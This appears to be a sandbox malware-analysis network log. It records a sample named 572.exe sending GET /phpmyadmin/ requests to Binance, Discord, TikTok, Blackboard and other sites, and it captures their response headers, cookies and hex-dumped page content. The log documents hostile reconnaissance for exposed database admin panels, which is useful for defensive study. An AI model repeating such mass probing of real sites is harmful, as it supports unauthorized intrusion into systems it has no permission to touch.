                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC701INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 66
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/en/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Gateway: traefik
                                                                                                                                                                                                                                                                                                                                                                X-Trace-Id: 2a778666d5de4c98bceb3daa903372a5
                                                                                                                                                                                                                                                                                                                                                                X-Traefik-Duration: 0.00
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 4b4ef7cefd8f81a1e60437d0590406b8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: _65Of6HlAJHGJEJdERKAkQRIMnA5FXAK0swYKQW3WUhs-OHQxFisDA==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC66INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 62 69 6e 61 6e 63 65 2e 63 6f 6d 2f 65 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://accounts.binance.com/en/phpmyadmin/">Found</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                46192.168.2.652157200.108.110.164443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC189OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: midetuvelocidad.claro.com.pe
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=f56319426a963327daf28d8a75c39ca1af53e110; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://midetuvelocidad.claro.com.pe/
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC15836INData Raw: 31 64 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1dd8<!doctype html><html class="no-js" lang="es" xml:lang="es"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC15967INData Raw: 6d 61 69 6e 2d 66 6f 6f 74 65 0d 0a 32 30 30 30 0d 0a 72 5f 5f 70 72 69 76 61 63 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 69 64 61 64 22 3e 50 6f 6c c3 ad 74 69 63 61 20 64 65 20 70 72 69 76 61 63 69 64 61 64 3c 2f 61 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 66 6f 6f 74 65 72 5f 5f 70 72 69 76 61 63 79 5f 5f 73 65 70 61 72 61 74 6f 72 22 3e 7c 3c 2f 73 70 61 6e 3e 20 3c 61 20 68 72 65 66 3d 22 2f 63 6f 6e 64 69 63 69 6f 6e 65 73 22 3e 54 c3 a9 72 6d 69 6e 6f 73 20 79 20 63 6f 6e 64 69 63 69 6f 6e 65 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: main-foote2000r__privacy"> <a href="/privacidad">Poltica de privacidad</a> <span class="main-footer__privacy__separator">|</span> <a href="/condiciones">Trminos y condiciones</a> </p>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                47192.168.2.65510754.158.51.60443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1583INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=A9A02D9FB3DF75193077ED2D9D9EEDA6; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142491,id:FD1371448EE0A85D04E713BCA22F73E0,signature:f8d1ef1e1e594172b6bd4570206464814f365f267c7910add598f8c19b134836,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:da65842d-7792-4117-8140-5d4ca0507355; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74491601D743418BDE5DF3CAB4B80021F6C6D167CCB4B2721CBC847670EB6882993042CB9AE5FF5E6B2476353C64427E9A9;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELBCORS=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74491601D743418BDE5DF3CAB4B80021F6C6D167CCB4B2721CBC847670EB6882993042CB9AE5FF5E6B2476353C64427E9A9;PATH=/;MAX-AGE=900;SECURE;SAMESITE=None
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-212-88.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC14801INData Raw: 33 62 36 31 0d 0a 3c 21 2d 2d 20 54 68 69 73 20 6c 6f 67 69 6e 2e 6a 73 70 20 66 69 6c 65 20 69 73 20 74 61 67 67 65 64 20 77 69 74 68 20 63 6f 6d 6d 65 6e 74 73 20 69 64 65 6e 74 69 66 79 69 6e 67 20 73 65 63 74 69 6f 6e 73 20 66 6f 72 20 65 61 73 79 20 65 64 69 74 69 6e 67 20 2d 2d 3e 0a 0a 3c 21 2d 2d 20 54 68 69 73 20 73 65 63 74 69 6f 6e 20 62 65 6c 6f 77 20 63 61 6c 6c 73 20 76 61 72 69 6f 75 73 20 73 65 72 76 6c 65 74 73 20 66 72 6f 6d 20 74 68 65 20 4c 65 61 72 6e 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 20 61 6e 64 20 6f 74 68 65 72 20 74 68 69 6e 67 73 20 79 6f 75 20 64 6f 6e 27 74 20 77 61 6e 74 20 74 6f 20 74 6f 75 63 68 2e 20 44 6f 20 6e 6f 74 20 64 65 6c 65 74 65 20 61 6e 79 74 68 69 6e 67 20 69 6e 20 74 68 69 73 20 73 65 63 74 69 6f 6e 20 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3b61... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC408INData Raw: 66 50 3a 28 29 3d 3e 61 2c 67 47 3a 28 29 3d 3e 6c 2c 68 35 3a 28 29 3d 3e 63 2c 6d 46 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 6e 3d 72 28 37 38 39 34 29 2c 69 3d 72 28 33 38 35 29 3b 63 6f 6e 73 74 20 6f 3d 7b 62 65 61 63 6f 6e 3a 22 62 61 6d 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 2c 65 72 72 6f 72 42 65 61 63 6f 6e 3a 22 62 61 6d 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 69 2e 5f 41 2e 4e 52 45 55 4d 7c 7c 28 69 2e 5f 41 2e 4e 52 45 55 4d 3d 7b 7d 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 2e 5f 41 2e 6e 65 77 72 65 6c 69 63 26 26 28 69 2e 5f 41 2e 6e 65 77 72 65 6c 69 63 3d 69 2e 5f 41 2e 4e 52 45 55 4d 29 2c 69 2e 5f 41 2e 4e 52 45 55 4d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 6c 65 74 20 65 3d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: fP:()=>a,gG:()=>l,h5:()=>c,mF:()=>s});var n=r(7894),i=r(385);const o={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net"};function a(){return i._A.NREUM||(i._A.NREUM={}),void 0===i._A.newrelic&&(i._A.newrelic=i._A.NREUM),i._A.NREUM}function s(){let e=
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC16384INData Raw: 31 30 30 31 37 0d 0a 73 65 2c 4d 4f 3a 69 2e 5f 41 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 46 45 54 43 48 3a 69 2e 5f 41 2e 66 65 74 63 68 7d 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 6c 65 74 20 72 3d 61 28 29 3b 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 3f 3d 7b 7d 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 74 3d 7b 6d 73 3a 28 30 2c 6e 2e 7a 29 28 29 2c 64 61 74 65 3a 6e 65 77 20 44 61 74 65 7d 2c 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 5b 65 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 6c 65 74 20 74 3d 61 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 2e 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 61 28 29 5b 65 5d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 10017se,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t){let r=a();r.initializedAgents??={},t.initializedAt={ms:(0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC16384INData Raw: 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 75 6c 74 72 61 2e 63 73 73 3f 76 3d 33 39 30 30 2e 38 34 2e 30 2d 72 65 6c 2e 33 31 2b 61 65 64 66 66 38 32 22 20 69 64 3d 22 63 73 73 5f 30 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 6d 75 6c 74 69 5f 66 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <link rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_fa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC16384INData Raw: b8 a5 61 72 72 61 6d 2c e1 b9 a2 61 66 61 72 2c 52 61 62 c4 ab ca bf 5c 27 61 6c 2d 41 77 77 61 6c 2c 52 61 62 c4 ab ca bf 5c 27 61 74 68 2d 54 68 c4 81 6e c4 ab 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 6c 2d c5 aa 6c c4 81 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 74 68 2d 54 68 c4 81 6e 69 79 61 2c 52 61 6a 61 62 2c 53 68 61 ca bf 62 c4 81 6e 2c 52 61 6d 61 e1 b8 8d c4 81 6e 2c 53 68 61 77 77 c4 81 6c 2c 44 68 c5 ab 5c 27 61 6c 2d 51 61 ca bf 64 61 2c 44 68 c5 ab 5c 27 61 6c 2d e1 b8 a4 69 6a 6a 61 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 47 52 45 45 54 49 4e 47 27 5d 20 3d 20 27 42 69 65 6e 76 65 6e 69 64 6f 2c 20 7b 31 7d 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: arram,afar,Rab\'al-Awwal,Rab\'ath-Thn,Jumd\'al-l,Jumd\'ath-Thniya,Rajab,Shabn,Raman,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE_SETTING
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC16384INData Raw: 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 64 65 70 6c 6f 79 6d 65 6e 74 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 63 6f 6e 74 65 6e 74 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 6f 72 74 66 6f 6c 69 6f 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 65 76 69 64 65 6e 63 65 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: deleteCookie("JSESSIONID", "/deployment", null, true); deleteCookie("JSESSIONID", "/content_area", null, true); deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null, true); de
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC12562INData Raw: 61 73 73 3d 22 6d 66 61 2d 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 3c 0d 0a 33 30 65 35 0d 0a 68 31 20 69 64 3d 22 6d 66 61 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 74 69 74 6c 65 22 20 3e 41 75 74 65 6e 74 69 63 61 63 69 c3 b3 6e 20 64 65 20 6d c3 ba 6c 74 69 70 6c 65 73 20 66 61 63 74 6f 72 65 73 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 74 6f 74 70 2d 76 65 72 69 66 69 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ass="mfa-modal-title"> <30e5h1 id="mfa-verification-title" >Autenticacin de mltiples factores</h1> </div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label for="totp-verific


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                48192.168.2.654614162.159.136.232443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1147INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://discord.com/phpmyadmin
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FfJNJF6iWpcBSlcy8G8NPGFjC1klpQNqzAVi%2FtRY%2B5y%2Fs8PV%2BrNeOY6TyNcHBwgPNrO3T%2BRhpmtBoqDvU86cG%2Bo8Bo7oTYz%2BU9WRJeQTBi7BCZocMFIXoTYfNpoG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=43d319574067941d37094b6910829d6525079fae-1707131691; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=mivNSf9oSiUKRxcfKY9K4iNJWXfyltRN7WeaBq4UOdM-1707131691764-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb717897674a-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                49192.168.2.65487413.249.120.86443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC466INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.tiktok.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: FunctionGeneratedResponse from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 8c912994a20734267c55d1a8cbbbe60e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: PfuIEYoc3M-9sJ7AsdBv7aMxntMiN5Z-FAUyNOWDfHCyk7z8N5DvjA==
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                50192.168.2.65489045.60.0.44443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC763INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=P6p5ySXxTI29D8eLDfOFoSvDwGUAAAAAQUIPAAAAAABWDxaPAifAZENIvBKIunF8; expires=Tue, 04 Feb 2025 10:21:10 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=5VIKOclosivXbhQKaJQkpgAAAABHFBG4vdmuxy6mQSvsEhco; path=/; Domain=.codere.com.co
